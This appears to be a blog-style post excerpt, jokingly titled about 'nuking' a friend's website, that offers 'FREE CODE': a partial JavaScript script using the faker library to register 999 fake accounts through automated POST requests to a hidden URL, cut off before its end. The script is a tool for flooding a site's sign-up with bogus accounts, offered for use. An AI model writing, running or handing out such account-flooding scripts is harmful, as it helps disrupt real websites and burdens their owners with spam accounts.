absolutely not nuking random website a friend made :3
Category: Web, HTML, Tech
FREE CODE!!!11!! const { faker } = require('@faker-js/faker'); const NUM_ACCOUNTS = 999; async function registerFakeAccount(i) { const username = "weenie" + i; const password = faker.internet.password(); const response = await fetch('################', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.strin » Continue Reading